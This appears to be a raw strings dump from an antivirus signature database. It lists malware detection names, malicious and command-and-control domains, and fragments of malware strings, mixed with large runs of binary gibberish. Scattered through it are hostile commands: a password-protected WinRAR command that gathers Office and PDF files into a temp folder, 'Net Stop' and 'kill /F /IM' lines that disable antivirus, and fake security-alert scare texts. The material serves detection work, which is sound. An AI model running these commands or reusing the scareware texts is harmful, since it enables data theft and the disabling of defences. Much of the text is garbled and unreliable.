!#SLF:AGGR:Masquerade_as!pspasswd.exe %|!#SLF:AGGR:Masquerade_as!pspasswd.exe !#SLF:AGGR:Masquerade_as!sigcheck.exe %|!#SLF:AGGR:Masquerade_as!sigcheck.exe !#SLF:AGGR:PdfDroppedByOffice!outlook %|!#SLF:AGGR:PdfDroppedByOffice!outlook !#SLF:AGGR:Masquerade_as!findlinks.exe &~!#SLF:AGGR:Masquerade_as!findlinks.exe !#SLF:AGGR:Masquerade_as!pendmoves.exe &~!#SLF:AGGR:Masquerade_as!pendmoves.exe !#SLF:AGGR:Masquerade_as!psloglist.exe &~!#SLF:AGGR:Masquerade_as!psloglist.exe !#SLF:AGGR:Masquerade_as!psservice.exe &~!#SLF:AGGR:Masquerade_as!psservice.exe !#SLF:AGGR:Masquerade_as!pssuspend.exe &~!#SLF:AGGR:Masquerade_as!pssuspend.exe !#SLF:TTCTX:AMSI2:ML:Js !#SLF:AGGR:ScriptDroppedByOffice!outlook (}!#SLF:AGGR:ScriptDroppedByOffice!outlook !#SLF:AGGR:Masquerade_as!notmyfault.exe !#SLF:AGGR:Masquerade_as!psloggedon.exe !#SLF:AGGR:Masquerade_as!regdelnull.exe !#SLF:AGGR:ScriptDroppedByOffice!commsapps !#SLF:TTCTX:AMSI2:ML:Vbs !#SLF:TTCTX:SCHEDULEDTASK_AMSI.A !#ALF:TTCTX:PsKeyloggersClipDetect.gen !#SLF:AGGR:Masquerade_as!logonsessions.exe !#ALF:TTCTX:PsKeyloggersVDetect.gen !#ALF:TTCTX:CaptureScreenBitDetect.BE!su !#SLF:TTCTX:Trojan:PowerShell/AmsiTamperingDetect.A !#SLF:TTCTX:AMSI2:ML:Jamsi !#SLF:TTCTX:Trojan:PowerShell/MSILAmsiTamperDetect.B !#SLF:AGGR:PeDroppedByStub!wmiprvse >]h|* P(L%G yS^ko #Af/5 %Vu+e' iP3]%UI h^2vv '\\ ,l h\"\t+C g 9P~' PmIR= \t ]p\" <-BH( x*4^_- ETpnd UMtb# <lWhf |VU{O aq@xQ[ ^x.J8 |q;,YO l,`Sz8!< >he]( ! Wx. !#ALF:HeraklezEval:Ransom:HTML/MalScript +(!#ALF:HeraklezEval:Ransom:HTML/MalScript A Zl><yF Qbo<nmV 0Mq^Y.) 0Mq^u F: ka EI9lp QCM\tg QCM A/ QCM(JO QCM)~ QCM+L QCM1e# QCMBlU. QCMF;E QCMM: QCMPDl. QCMaEv\" QCMc+ !#ALF:HeraklezEval:PUA:Win32/InstallCore +(!#ALF:HeraklezEval:PUA:Win32/InstallCore D(=r4 `wd\\Z \td-*<+ a68HL \t2R<Q \tVGqP w9 c:\\temp\\wpdnse\\4abb a.nls c:\\*.doc c:\\*.docx c:\\*.pdf c:\\*.mvd c:\\*.tif c:\\*.xls c:\\ \"c:\\program files\\winrar\\rar.exe\" u -apf -r -ed -tk -dh -sl -hpthistw0piece -ta c:\\temp\\wpdnse\\4abb a@.nls f:\\*.doc f:\\*.docx f:\\*.pdf f:\\*.mvd f:\\*.tif f:\\*.xls f:\\ !#NRI:Dirtvantunisi.20210830 p\"//datacentral.cc p .datacentral.cc //navar.co .navar.co //reelmi.co .reelmi.co //vktio.co .vktio.co p0//americanbethgroup.com p..americanbethgroup.com p*//cloudcompute3k.com p(.cloudcompute3k.com p0//foxmailservices.email p..foxmailservices.email p //webdata.email .webdata.email pTnuxcol-secondary.z29.web.core.windows.net p&//shuztacomme.rest p$.shuztacomme.rest p\"571917.selcdn.ru p\"578500.selcdn.ru p\"583119.selcdn.ru p\"584615.selcdn.ru p\"585808.selcdn.ru p\"585809.selcdn.ru p\"585810.selcdn.ru p(//waveformtech.shop p&.waveformtech.shop p(//zinetuskacdn.shop p&.zinetuskacdn.shop p&//dksupplies.store p$.dksupplies.store !#NRI:Dirtvantinize.20210830 p //akamainet.com .akamainet.com p$//alfanalytic.com p\".alfanalytic.com p2//archives-firmwares.com p0.archives-firmwares.com p&//asdstatistic.com p$.asdstatistic.com //cosmstat.com .cosmstat.com p.//developmentsdata.com p,.developmentsdata.com p&//dlinknetwork.com p$.dlinknetwork.com p$//gtstatistic.com p\".gtstatistic.com p,dev.juniperupdate.com p0dev.mikrotifirmware.com p.//mikrotikfirmware.com p,.mikrotikfirmware.com p //statislog.com .statislog.com p\"//styservice.com p .styservice.com //tirstat.com .tirstat.com p //veeamdata.com .veeamdata.com //3comnet.net .3comnet.net p www.amibios.net p4www.windowsrepository.net !#NRI:Dirtvantufiti.20210830 p //seachbeet.art .seachbeet.art p //trekpower.art .trekpower.art pRbrdocumentosx.s3.us-west-1.amazonaws.com pLinformexbr.s3.us-west-1.amazonaws.com pRmasterplusdoc.s3.us-west-1.amazonaws.com pNwebmasterx2.s3.us-west-1.amazonaws.com p,//prestiobark.digital p*.prestiobark.digital p(//trekpower.digital p&.trekpower.digital p\"//barielregis.me p .barielregis.me //brinpit.me .brinpit.me p*//oficemasterples.me p(.oficemasterples.me p(//pedalmercadosx.me p&.pedalmercadosx.me p&//princidomanex.me p$.princidomanex.me p$//relamercadox.me p\".relamercadox.me p //webmasterx.me .webmasterx.me p,gaspar-op.duckdns.org p2gasparavisos.duckdns.org p.pedrexpgbl.duckdns.org !#NRI:MACE:Domains:CobaltStrike_25.A `\\|?49 :#egv. p%vB' !#ALF:JASYP:PWS:MSIL/Mintluks!atmn /filealign:0x r`B/filealign:0x /optimize+ /platform:x86 /debug- /target:winexe !#ALF:JASYP:Worm:Win32/Brontok!atmn c:\\windows\\system32\\s c:\\documents and settings\\alan tracey\\lo\\dv 01c:\\documents and settings\\alan tracey\\lo\\dv 0%c:\\windows\\system32\\s \ty.exe 02c:\\documents and settings\\alan tracey\\lo\\dv \"c:\\windows\\system32\\s `oel ;0 `oel \"c:\\documents and settings\\alan tracey\\lo\\dv [c:\\windows\\system32\\s nc:\\windows\\system32\\s nc:\\documents and settings\\alan tracey\\lo\\dv !#ALF:JASYP:Backdoor:MSIL/Androm!atmn o` \"m o` \"m o` \"m NB):S g)gS[| tt:set:ma= g)gS;~ 7uuiv MZz.#N g)gSj provider=microsoft. .oledb. .0;data source=c:\\users\\mdeservi\\onedrive - lowe's companies inc\\desktop\\pto\\troutmanpto_db. o` #k o` #k `oel ;0 `oel C0\" ] `oel ;0 `oel C0$ ] c:\\win YU6}T YU6}y F,i=J u13s( \"1$nH iQs>@ $p\\=%p !#ALF:HeraklezEval:HackTool:Win32/AutoKMS!rfn +-!#ALF:HeraklezEval:HackTool:Win32/AutoKMS!rfn qB<n& ?-lN(?. CW7;T /&O\\K4\t /&O\\K4= /&O\\K4EO &M[,A _[U4Jd Wm7A5e $ Si0 %p\\:&p !#ALF:HeraklezEval:Trojan:Win32/Ymacco!rfn +*!#ALF:HeraklezEval:Trojan:Win32/Ymacco!rfnFCz !t{b~ 3Qbl> HV#ho i%nhe /&O\\K44 +*K~0 +!jWt& -c';X *jO8Z RW5e+$z RW>UG %zNd( lXj-W X9t|` GXxn$ Tm8GW &\"OpW t\"[)/zm t18?]D t18?] As;v&5R k#y\ti aVyz- 71'z3 </_' [Jhr\\ <3Z=R <3Z=R <7$h <9 Z.W <9 Z.W bH(C) <9c& <9c& <:!~ <:1[ <:ke uTmmY8M <A,EZ <A,EZ <Bp+ M 0b/ <H=) uSN2?9#H <IL] [\\9Y <IL] [\\9Y <JjF <KHW<4^ <KHW<4^ <M#w[ <M#w[ <Mzw j,N,(\t; <N^R <Q|r <R]n i*t!fL <Zu <[C(} <[C(} -Y :< v?4S<9[ <a-mXm <a-mXm <b(` <kR/ -{MV' 5> h <q\"Gdf <q\"Gdf <tc! <w6V< <w6V<~c <wm~ o\"Ur0+ %-K\"G^'e@ !\\f{M f=&k( Xr16# ;KTw.f l^t0* 21;Yo !C!IW 3b/#m QO]BNG l pvnO FN-o5 % }Be e<(^* ^B[tdm ^b'qS i4B3Dp CUFu) $H;(P 5]#,c )dOd:4o 7}IR` {jJxF~, Ft X'W a]aD^Ycu ^xiMG Z_X\\T GDp_Yz ,YWMn\t n\"DjU3 $8H4)e Yxe`b @i)+B( 0' <%Ujs )|$Yb`\t =Z6Sd BHko0` Ur^6HY # ]R0 NevN, o)[SM sGZFM `#~9 cyt5+_m TV`\t&Z X!mn[> ?1-#g Sg&*- You Now Hacked !!! Net Stop Norton Antivirus Auto Protect Service Net Stop mcshield Net Stop mcshield~ x{Db~ \t{qgL *OL^! !Istbar.A !Small.AC !Small.AB !Wintrim.B !Killav.BF !Agent.C !Ranky.A !Ranky.B !Killav.AL !Killav.BD !Killav.AT !Killav.AX !Killav.BB MonitoringTool:Win32/Iambigbrother \"MonitoringTool:Win32/Iambigbrother \\fonts\\system\\explorer\\mru\\] %\\fonts\\system\\explorer\\mru\\] !Ldpinch.P !Ldpinch.R !WebCamNow.A !IED.1_01 !ICQNotify !ICQPager 7!\"t =rp !Startpage.Y !SecondThought.A !SecondThought.C BrowserModifier:Win32/iDonateBHO BrowserModifier:Win32/iDonateBHO \\idonate.dll] $\\idonate.dll] !EGroup.C SOFTWARE\\Microsoft\\Internet Explorer\\AdvancedOptions\\BROWSE\\FRIENDLY_ERRORS SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E96D-E325-11CE-BFC1-08002BE10318} dial a PREMIUM RATE NUMBER that you are the line subscriber --IEAccess nocreditcard.com/dial.php nocreditcard.com/dial.php_ \\ieaccess2.dllc& %\\ieaccess2.dllc& Software\\Classes\\software\\egroup Software\\Classes\\software\\egroupc& Software\\Classes\\software\\egroupc' software\\classes\\ieaccess2.iedial !software\\classes\\ieaccess2.iedialc) software\\classes\\ieaccess2.iedial.1 #software\\classes\\ieaccess2.iedial.1c- software\\classes\\ieaccess2.iedial\\clsid 'software\\classes\\ieaccess2.iedial\\clsidc. software\\classes\\ieaccess2.iedial\\curver (software\\classes\\ieaccess2.iedial\\curvercf software\\microsoft\\code store database\\distribution units\\{1d2dca0d-b30f-40ad-9690-087105f214ec} `software\\microsoft\\code store database\\distribution units\\{1d2dca0d-b30f-40ad-9690-087105f214ec}] !IELoader :GDV \\py.exe_ \\aaa.exe_ \\zzb.exe_ \\iagold.exe_( \\downloaded program files\\ieloader.exe] :G_\t%\\py.exe_ %\\aaa.exe_ %\\zzb.exe_ %\\iagold.exe_($\\downloaded program files\\ieloader.exe] !IEPlugin ISOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects 46fBi500000000000_ !Profile.Interests.IE.Favorites.%i Name \"Internet Explorer\" &{871A54C1-1EB3-48bd-A879-5DBA4EF16BE6} bush_ssevent klinton_ssmmf salan_ssmutant salan_ssmutantg 69bc- 8^(~( )oj.g g+SwY g&PuP IEPluginDesktopToolbar IEPluginDesktopRebar Min ToolBar Go ToolBar Software\\dsktb\\ http://search.shopnav.com/ http://search.shopnav.com/_ \\systb.exe_ $\\systb.exe_ \\wupdt.exe_ $\\wupdt.exe_ \\winserv.exe_ $\\winserv.exe_ \\ieplugin.dll_ %\\ieplugin.dll_ \\winobject.dll_ $\\winobject.dll_ \\winobject.dll`\t \\se\\v11` %\\winobject.dll`\t&\\se\\v11` \\-games-` \\-music-` \\-entertainment-` \\-communications-` \\-business directory-` \\-health and fitness-` \\-computers and internet-c Software\\salm Software\\salmc SOFTWARE\\salm SOFTWARE\\salmc Software\\intexp Software\\intexpc Software\\intexp\\Config Software\\intexp\\Configc SOFTWARE\\Classes\\Wbho.Band SOFTWARE\\Classes\\Wbho.Bandc SOFTWARE\\Classes\\Wbho.Bandc\" SOFTWARE\\Classes\\Wbho.Band.1 SOFTWARE\\Classes\\Wbho.Band.1c\" SOFTWARE\\Classes\\Wbho.Band.1c# Software\\dsktb\\DesktopToolbar Software\\dsktb\\DesktopToolbarc# Software\\intexp\\MyFileSystem2 Software\\intexp\\MyFileSystem2c) Software\\Classes\\imitoolbar.imitool #Software\\Classes\\imitoolbar.imitoolc) #Software\\Classes\\imitoolbar.imitoolc+ Software\\Classes\\imitoolbar.imitool.1 %Software\\Classes\\imitoolbar.imitool.1c+ Software\\Classes\\imitoolbar.leftframe %Software\\Classes\\imitoolbar.leftframec+ %Software\\Classes\\imitoolbar.leftframec- Software\\Classes\\imitoolbar.bottomframe 'Software\\Classes\\imitoolbar.bottomframec- Software\\Classes\\imitoolbar.leftframe.1 'Software\\Classes\\imitoolbar.leftframe.1c- Software\\Classes\\imitoolbar.popupwindow 'Software\\Classes\\imitoolbar.popupwindowc- 'Software\\Classes\\imitoolbar.popupwindowc. Software\\Classes\\imitoolbar.popupbrowser (Software\\Classes\\imitoolbar.popupbrowserc. (Software\\Classes\\imitoolbar.popupbrowserc/ Software\\Classes\\imitoolbar.bottomframe.1 )Software\\Classes\\imitoolbar.bottomframe.1c/ Software\\Classes\\imitoolbar.popupwindow.1 )Software\\Classes\\imitoolbar.popupwindow.1c/ )Software\\Classes\\imitoolbar.popupwindow.1c0 Software\\Classes\\imitoolbar.popupbrowser.1 *Software\\Classes\\imitoolbar.popupbrowser.1c0 *Software\\Classes\\imitoolbar.popupbrowser.1cA SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE Help ;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IE HelpcA SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SE Help ;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SE HelpcB SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\BMSE dbl <SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\BMSE dblcD SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEC system >SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IEC systemcF SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SE Assistant @SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SE AssistantcH SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Sidebar Search BSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Sidebar SearchcI SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Search Function CSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Search FunctioncJ SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Search Assistant DSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Search Assistantcf SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{666DDE35-E955-11D0-A707-000000521958} `SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{666DDE35-E955-11D0-A707-000000521958}cf SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{666E4D35-E955-11D0-A707-000000521958} `SOFTWARE\\Microsoft\\Code Store Database\\Distribution Units\\{666E4D35-E955-11D0-A707-000000521958}cf software\\microsoft\\code store database\\distribution units\\{556dde35-e955-11d0-a707-000000521958} `software\\microsoft\\code store database\\distribution units\\{556dde35-e955-11d0-a707-000000521958}cj Software\\microsoft\\windows\\currentversion\\uninstall\\Internet Explorer Toolbar - Intelligent Explorer dSoftware\\microsoft\\windows\\currentversion\\uninstall\\Internet Explorer Toolbar - Intelligent Explorer] BrowserModifier:Win32/IETray Software\\Classes\\iempg.iempgobj Software\\Classes\\iempg.iempgobjc% Software\\Classes\\iempg.iempgobjc' Software\\Classes\\iempg.iempgobj.1 !Software\\Classes\\iempg.iempgobj.1c' !Software\\Classes\\iempg.iempgobj.1c: software\\microsoft\\internet explorer\\menuext\\&define 4software\\microsoft\\internet explorer\\menuext\\&definecB software\\microsoft\\internet explorer\\menuext\\&search the web <software\\microsoft\\internet explorer\\menuext\\&search the web] !IExploresTrojan \\iexplore.exe] %\\iexplore.exe] BrowserModifier:Win32/IGetNet a?GIz X~cog `3yeY shell322.exe bho.dl_ bho.dllbho.dl_ Overwriting HOSTS file '%s'. iGetNet \\nlnp29.exe_ \\rsp001.dll_ _ %\\nlnp29.exe_ %\\rsp001.dll_ \\winstart.exe_ %\\winstart.exe_ \\winstart001.exe_ %\\winstart001.exe_ \\update_removeold.dllc! %\\update_removeold.dllc! Software\\Classes\\rsp.bizlgk Software\\Classes\\rsp.bizlgkc! Software\\Classes\\rsp.bizlgkc' Software\\Classes\\bho.clsurlsearch !Software\\Classes\\bho.clsurlsearchc' !Software\\Classes\\bho.clsurlsearchc1 software\\vb and vba program settings\\ie rsp +software\\vb and vba program settings\\ie rspcf software\\microsoft\\code store database\\distribution units\\{60e78cac-e9a7-4302-b9ee-8582ede22fbf} `software\\microsoft\\code store database\\distribution units\\{60e78cac-e9a7-4302-b9ee-8582ede22fbf}] MonitoringTool:Win32/IllLogger MonitoringTool:Win32/IMSIWebScreenCapture )MonitoringTool:Win32/IMSIWebScreenCapture MonitoringTool:Win32/Informer Jiang !Insider \\mdioctl.exe_ $\\mdioctl.exe_ c:\\mdioctl.exe_ \\outlook express\\waberes.dll] &\\outlook express\\waberes.dll] !UnBob !EGroup.G !EGroup.G@@$ eghtmldialer.dll (http://network.nocreditcard.com/DialHTML SOFTWARE\\egroup IEDiscoShowTime TopMostIEDisco 6The connection has been cut, do you want to reconnect? RASPHONE.EXEg ()]fg []7xb []7xb\t\t CEGException::CEGException() entered eghost_ dorasmonitor C|./\" z\\M=b4 'o+A;#W \\mseggrpid.dl_ %\\mseggrpid.dl_ \\exedialer.exe_ $\\exedialer.exe_ \\nocreditcard.lnk_ \\nocreditcard.lnk_( \\downloaded program files\\netslv32.inf` \\nocreditcard.lnk_($\\downloaded program files\\netslv32.inf` \\instant access\\center` &\\instant access\\center` \\instant access\\dialerc) &\\instant access\\dialerc) SOFTWARE\\CLASSES\\EGDHTML.EGDialHTML #SOFTWARE\\CLASSES\\EGDHTML.EGDialHTMLc* SOFTWARE\\CLASSES\\EGDialObject.EGDial $SOFTWARE\\CLASSES\\EGDialObject.EGDialc+ SOFTWARE\\CLASSES\\EGDHTML.EGDialHTML.1 %SOFTWARE\\CLASSES\\EGDHTML.EGDialHTML.1c, SOFTWARE\\CLASSES\\EGDialObject.EGDial.1 &SOFTWARE\\CLASSES\\EGDialObject.EGDial.1c, SOFTWARE\\Classes\\EGCOMSERVICE.EGComSvc &SOFTWARE\\Classes\\EGCOMSERVICE.EGComSvcc. SOFTWARE\\Classes\\E (SOFTWARE\\Classes\\E Lua:VobfusFileDrop !#Lua:MsBuildSuspicious.B !#Lua:MsBuildSuspicious.BObMpAttributes installutil.exe 254053470526 attrmatch_rescan_notmyapp 7db300d4c5ee (.+\\) 43b33d80ac7c 43b33d80ac7cIncludesBMLuaLib DllMsiexecInject.A_CmdLineDll ([%w%p]+);([%w%p]+) 1d5b369316017 \tYEF@ !#PEPCODE:Trojan:Win32/Vundo.gen!BK.2 !ih+Lu WWT/0q (H;C `5AyN IkC=x Ls5?' Ct>D# CssS < .0Knq2 )A ;% =qz;0& \\S{Zy` y\"LnY:6 Q~Gk: [#%Co QXm1|V #)fS.Y2 )V0nr 01f$S % ^^N }w&~| {74pv ,N..h DA {C %\tDy 7;%A7P }v3]A K(ty:of i=}py aDu@@ fgn>E =),) mw&qN Gmd@q Y $iu+ % |Pm) % |Pm) %#QA o_1[a= JzQr<2 %1'@cF %1'@cF ^ d|p Xm,f4e %3@z SY-.1 %8fa %9gX Eg;k' %V~ny {4fA2v %=lFZ %=lFZ %>:_ %>aH cZt|h %CY` %C^kD %C^kD L}7 lx %HS] %H{w `0 ]XJ %K5s Y|O#7 lg H#y |C8WmB %PI\\ gsX\"~r %SfC L.GIF L1.GIF AntiVirus kill /F /IM Automatic Updates feture is enabled. onclick=\"myNav(3001);\" type=button value=\"Activate Now! onclick=\"navigatetothevcation(3001);\" type=button value=\"Activate Now! .innerHTML='Spyware protection .innerHTML = 'Updates are /buy.php?fram .php?frame=1 &advid=%s &advid=%sx LeostreamConnect Infected! Filesystem: %s Registry: %s File: %d, Signature: %s Registry scan... File system scan... Express scan... Databases not found. ANTIVIRUS %s.quarantine Data loss risk: %s Privacy risk: %s %d threats removed Your license has expired. Please register again to obtain new license! You have to agree that you understand that your system protection is disabled Applicaion script error: Security Center is minimized, but is still active to protect your system. BPlease enter your activation code Very High Severe HighVery HighSevere %s%s%s%s%s Jt Ju H%`Zb 4b'_k 8D9:b9 W9J.xJ |&(9 5S|+U HSTR:FakeSecSenUninstall&SIGATTR:FakeSecSenUninstall 84HSTR:FakeSecSenUninstall&SIGATTR:FakeSecSenUninstall (PEPCODE:Program:Win32/Antivirus.1|PEPCODE:Program:Win32/Antivirus.3)&HSTR:Program:Win32/Antivirus.2_ hd(PEPCODE:Program:Win32/Antivirus.1|PEPCODE:Program:Win32/Antivirus.3)&HSTR:Program:Win32/Antivirus.2_ \\drantispy.lnk_ \\MSAntivirus.lnk_ \\System A.V..lnk_ \\Windows A.V..lnk_ \\ms antivirus.lnk_ \\Advanced A.V..lnk_ \\Ultimate A.V..lnk_ \\Adv. Antivirus.lnk_ \\microantivirus.lnk_ \\Micro Antivirus.lnk_ \\Ultra Antivirus.lnk_ \\power antivirus.lnk_ \\AntiVirus Sentry.lnk_ \\system antivirus.lnk_ \\spyware preventer.lnk_ \\windows antivirus.lnk_ \\advanced antivirus.lnk_ \\ultimate antivirus.lnk_ \\Micro Antivirus 2009.lnk_ \\Ultra Antivirus 2009.lnk_ \\vista antivirus 2008.lnk_ \\system antivirus 2008.lnk_ \\windows antivirus 2008.lnk_ \\ultimate antivirus 2008.lnk_! \\xpert antivirus enterprise.lnk` \\AVS` &\\AVS` \\SPP` &\\SPP` \\UAV` &\\UAV` \\VAV` &\\VAV` \\WAV` &\\WAV` \\aav` &\\aav` \\msa` &\\msa` \\msx` &\\msx` \\pwa` &\\pwa` \\pwx` &\\pwx` \\sav` &\\sav` \\xpa` \\MicroAV` \\UltraAV` &\\xpa` &\\MicroAV` &\\UltraAV` \\drantispy` &\\drantispy` \\ieantivirus` &\\ieantivirus` \\ms antivirus` &\\ms antivirus` \\MicroAntivirus` &\\MicroAntivirus` \\Ultra Antivirus 2009c= &\\Ultra Antivirus 2009c= SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AVS 7SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\AVSc? SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinAV 9SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinAVcA SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\UltraAV \\aav.cplq \\msa.cplq \\msx.cplq \\pwa.cplq \\pwx.cplq \\sav.cplq \\spp.cplq \\uav.cplq \\vav.cplq \\wav.cplq \\xpa.cplq ;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\UltraAVq %\\aav.cplq %\\msa.cplq %\\msx.cplq %\\pwa.cplq %\\pwx.cplq %\\sav.cplq %\\spp.cplq %\\uav.cplq %\\vav.cplq %\\wav.cplq %\\xpa.cplq \\UltraAV.cplq %\\UltraAV.cplq \\microav.cplq %\\microav.cplq \\drantispy\\drantispy.exe] &\\drantispy\\drantispy.exe] !Slenfbot.ADZ !PornDialer.H RasSetEntryDialParamsA verificato un errore. L'applicazione Verr QUELLO CHE TI PIACE STOP-PEDOFILIA Apertura Porta... Connessione Device... CONNESSO! i t Hu[h !Renos.EH !Renos.EG !Zlob.ANR \\MmQT_v _svn\\AdbDeviceJobThread.cpp !Pushbot.HY !Renos.EI uid=%s&os=%s id=%lu&adv=%lu&uid=%s wget 3.0 !Bagle.UK !Zlob.ANS __TH_STOP__ __PM_MONITOR_STOP__ __HIRE__ Shell_TrayWnd %saswe%d.ex%s %saswe%d.ex%sxo evc.php?id=dw0%d Your system is unprotected from new version of SpyBot@MXt 9Your system is unprotected from new version of SpyBot@MXt SpyBot@MXt is a malware programtrojan horse that steals information and gathers Your system is probably infected with latest version of Spyware.CyberLog-X. KYour system is probably infected with latest version of Spyware.CyberLog-X. gatevc.php?pn=srch0p%dtotal Your computer is infected with last version of PSW.x-Vir trojan. PSW trojans steal your private information such as: passwords, IP-address, credit card information, registration details, documents, etc. System Alert: Trojan-Spy.Win32@mx !System Alert: Trojan-Spy.Win32@mx Security Alert: NetWorm-i.Virus@fp \"Security Alert: NetWorm-i.Virus@fp %d.bat /files/get.php? /files/get.php?] !Busky.EM !Vundo.IQ /in.php?id= 0 G/in.php?id= 0 !Dreammon.C dream/dream.php http://%s/%s?type=exe&cookie= DreamOnceFunDownPath ini.officesupdate.net ini.office2005updates.net ini.msnmessengerupdate.net ini.msnmessengerupdate.net] !Zlob.ANT zerg] !Bagle.J !Slenfbot.AEA !Slenfbot.AEB <# ph/4rd !Slenfbot.AEC !Slenfbot.AED !Slenfbot.AEE !Zlob.AMV TDL\\$ __PM2_UPD__ iebtm.exe mmmwtf ?N=S7P%1.1dN8K3 gate.php __ISC _MM_F _MM_F] !Neeris.AI !Slenfbot.AEF TrojanDownloader:HTML/Renos.C <h1>recommendations</h1><b>installantivirusandantispywaresoftware(giveninnoparticularorder):</b><br/><br/>+vistaavsec w<h1>recommendations</h1><b>installantivirusandantispywaresoftware(giveninnoparticularorder):</b><br/><br/>+vistaavsec TrojanDownloader:ASX/Wimad.H X__asf_script_command_rpf_generated__ http://www.mp3codec.info/ /load.php?id= !Bagle.K !Renos.CD !Zlob.ANV !Bagle.UL !Pushbot.HZ !Slenfbot.AEG !Slenfbot.AEH !Slenfbot.AEI !Neeris.AJ !Slenfbot.AEJ !Vundo.gen!Z !Zlob.ANW mmmwtf] !Pushbot.IA !Pushbot.IB !Cinmus.M \\\\.\\Scsi !Bagle.UM !Bagle.UN !Bagle.UO -6=Rn !Bagle.UQ -6=R2 MonitoringTool:Win32/AIOKeylogger !MonitoringTool:Win32/AIOKeylogger !Renos.EJ !Gimmiv.A !Agentsmall.I !Busky.M !Renos.EK TrojanDownloader:ASX/Wimad.I @__asf_script_command_rpf_generated__ http://freevideoz.info/ !Pushbot.IC !Slenfbot.AEK !Slenfbot.AEL Rogue:Win32/FakePowav Rogue:Win32/FakePowav @ 06_kK w\"b?0 0(m94 [http:// /installok YGHelper.DLL YGHelper.DLLDllCanUnloadNow YGHelper.SearchHelper $1F2D9C47-6AC9-4872-AACC-E1CD494F040C $1F2D9C47-6AC9-4872-AACC-E1CD494F040Ca Tgooglina.DLL Tgooglina.DLLDllCanUnloadNowDllGetClassObjectDllRegisterServerDllUnregisterServer $44d6897b-66fb-4d19-8f5a-5caf3665c13f $b6681c49-c882-4484-b59e-329f6fc5a3b7 $b6681c49-c882-4484-b59e-329f6fc5a3b7a rapidantivirus.com [Spyware.CyberAlert2; ProcessesToKill=1 RegKeysValueToDelete=1 Description: Advice: Alert level: $Windows\\CurrentVersion\\Run\\\"Default\" support@eurekalog.com support@eurekalog.coma HowToBuy.txt (C:\\Documents and Settings\\JohnDoe\\Deskto \"Are you sure you want to uninstall \\Rapid Antivirus WinX Security Center \\Win Antivir 2008 WinXDefender WinXProtector Power-Antivirus-2009 Power-Antivirus-2009g& Uninstall HowToBuy.txtxQ softwares required for virus softwares required for virusxT to delete a virus WARNING_VIRUS_DETECTED xa 832172A0AC9EF2755DAFD05E77E35A24 832172A0AC9EF2755DAFD05E77E35A24 -uninstall Spy Protector lsascs.exe /installok?ref_id= &sub_id= /install.exe Error running executable. Please try again +Error running executable. Please try again system_protector Installing System Protector... Installing System Protector...x System will be restored in %d seconds. &System will be restored in %d seconds. *** STOP: 0x00000019 (0x00000000,0xc00E0FF0,0xFFFFEFD4,0xC0000000) B*** STOP: 0x00000019 (0x00000000,0xc00E0FF0,0xFFFFEFD4,0xC0000000) BAD_FOOL_HEADER Dll Base DAteStmp - Name -help _AppManager /order.php?lang=en&aid= /checkupdate.php?x=123 /checkupdate.php?x=123x System Protector cs.exe 0Scan with Critical WINXDEFENDER_BASE Description: W32.Spybot.AQGF is a worm that spreads through mIRC and to network ODescription: W32.Spybot.AQGF is a worm that spreads through mIRC and to network Description: Trojan.Goldun.G is a Trojan horse program that steals passwords LDescription: Trojan.Goldun.G is a Trojan horse program that steals passwords Security Center_AppManager_server_mutex (Security Center_AppManager_server_mutex Security Center_AppManager_send_event &Security Center_AppManager_send_event extraantivir.com MalwareRemoval uninstall {C4AC7423-017C-47EA- uninstall{C4AC7423-017C-47EA- registration registration{C4AC7423-017C-47EA- System slowdown or not starting up Infecting other computers in your network securitystatus2 securitystatus3 {C4AC7423-017C-47EA-9219-00D4192C7D76} \\u404.exe_ \\lsascs.exe_ \\podmena.exe_ \\shellex.dll_ \\windll32.exe_ \\spyprotector.cpl_ %\\spyprotector.cpl_ \\Spy Protector.lnk_ \\System Protector.lnk_ \\Microsoft\\windll32.exe_# \\desktop\\power-antivirus-20??.lnk_0 \\Microsoft\\windll32.exe_#(\\desktop\\power-antivirus-20??.lnk_0 \\power-antivirus-20??\\power-antivirus-20??.ini_0 \\power-antivirus-20??\\power-antivirus-20??.exe_? \\power-antivirus-20??\\power-antivirus-20??.ini_0&\\power-antivirus-20??\\power-antivirus-20??.exe_? \\programs\\power-antivirus-20??\\start power-antivirus-20??.lnk` \\SpyProtector` \\Spy Protector` &\\Spy Protector` \\AVDefender2011` \\Rapid Antivirus` &\\Rapid Antivirus` \\System Protector` \\System Protector] &\\System Protector] Rogue:HTML/FakeXPA <scripttype=\"text/javascript\"src=\"scaner/char-funct.js\"></script><scripttype=\"text/javascript\"src=\"scaner/var-code.js\"></script><scripttype=\"text/javascript\"src=\"scaner/decode-funct.js\"></script> !Vundo.IS !Zlob.gen!CH real.dllDllCanUnloadNowDllGetClassObjectDllRegisterServer hleo.dllDllCanUnloadNowDllGetClassObjectDllRegisterServerDllUnregisterServer 